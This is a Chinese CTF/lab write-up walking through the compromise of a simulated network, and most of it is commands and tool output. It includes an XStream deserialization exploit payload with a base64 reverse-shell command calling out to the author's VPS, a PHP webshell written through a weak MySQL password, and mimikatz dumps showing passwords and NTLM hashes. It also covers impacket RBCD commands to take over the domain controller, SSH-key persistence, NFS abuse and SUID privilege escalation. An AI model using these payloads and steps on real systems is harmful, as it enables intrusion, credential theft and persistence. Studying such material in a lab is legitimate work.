考点:
- xstream RCE
- mysql弱口令+写马
- ACL Admins写RBCD
- linux写公钥连接
- NFS利用
- ftp提权
主页没东西,扫一下
./fscan -h 39.99.135.35
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.99.135.35 is alive
[*] Icmp alive hosts len is: 1
39.99.135.35:80 open
39.99.135.35:8080 open
39.99.135.35:21 open
39.99.135.35:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.135.35 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.99.135.35:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://39.99.135.35:8080 code:200 len:3655 title:公司发货单
看到有个ftp服务,能匿名登上去,连一下
1.txt里没东西,pom.xml:
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
看到配置直接找到xstream的洞了,照着打即可
https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
在你的vps上开放1099端口,然后用yso起一下服务:
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
接着监听一下弹shell的端口,然后向网站传poc
POST /just_sumbit_it HTTP/1.1
Host: 39.99.135.35:8080
Content-Length: 3119
Accept: application/xml, text/xml, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://39.99.135.35:8080
Referer: http://39.99.135.35:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Content-Type: application/xml
Connection: close
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>VPS_IP</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>VPS_IP</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
然后wget一下fscan和Stowaway,打内网老两样了
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456
这里172.22.13.28是个mysql弱口令,起一下全局代理用navicat连上去
看了一下secure_file_priv,发现是空的,所以能写文件上去
show variables like "secure_file_priv";
查看日志发现是phpstudy起的服务,那就很好,因为这东西权限很高,一般连上去就是system权限,不用udf提权了
show variables like "%general%"
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
连一下
然后老地方拿到flag
然后建个用户rdp上去
net user fushuling qwer1234! /add
net localgroup administrators fushuling /add
用BloodHound发现zhangwen这个用户是ACL Admins组的,对WIN-DC具有WriteDacl权限,能写属性,比如写个DCSync、RBCD啥的。不过首先先抓一下密码,把这个用户密码抓出来
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
Authentication Id : 0 ; 219475 (00000000:00035953)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2023/10/4 16:46:14
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
然后用RBCD打一下就行了,我这里当时没截图,只能用history看一下当时的命令了
proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'
proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6
export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache
然后改/etc/hosts把dc加进去,即可无密码连上去
proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6
然后我当时傻逼了,想着还剩一个flag没打那就抓一下哈希横向过去,但最后一个flag在的地方是那个centos机器里,不在域内,不过这里也给一下当时的命令
proxychains python3 secretsdump.py -k -no-pass WIN-DC.xiaorang.lab -dc-ip 172.22.60.8
虽然抓到了哈希但没卵用
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:
回到这个linux服务器,因为我们之前是弹shell打的,命令执行很麻烦而且没法持久化利用,所以我给root目录下写了ssh-keygen公钥然后就可以用私钥连上去了。
先在本地机子创建rsa密钥
ssh-keygen -t rsa -b 4096
可以看到我生成的公私钥创建在了/home/fushuling/.ssh/目录下,/home/fushuling/.ssh/id_rsa.pub的内容就是我们要写入的公钥
在弹的shell上执行:
cd /root
mkdir .ssh
然后把公钥传进去
echo "公钥内容" >>/root/.ssh/authorized_keys
接下来回到我们本地的机子上,就能用私钥连接上去了
当然,我们也可以把id_rsa的内容保存出来用xshell连上去,我后面就这么打的
题目说有一个NFS服务,也就是那个centos,首先更新一下连上去的那台机子上的依赖,不然没有相应的命令
sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y
接下来在根目录挂载一下服务
cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock
挂载了之后只能访问home目录,我们再次写公钥,就能连上centos机器了
ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
上去之后根目录有一个flag但没权限读,有一个用户账户但没什么卵用,看一下怎么提权
find / -user root -perm -4000 -exec ls -ldb {} \;
一眼ftp,这个能suid所以我们能把flag传到ftp里。最初我们获得的机器里那个ftp服务没权限传,我们再起个
python3 -m pyftpdlib -p 6666 -u test -P test -w &
然后连上去(注意是内网ip)
ftp 172.22.13.14 6666
put /flag02.txt
然后我们在外面连一下就能找到传上来的flag了
看了一下x1r0z的wp,NFS这里似乎能直接提权:nfs提权,不过我都用suid了,这里就略过了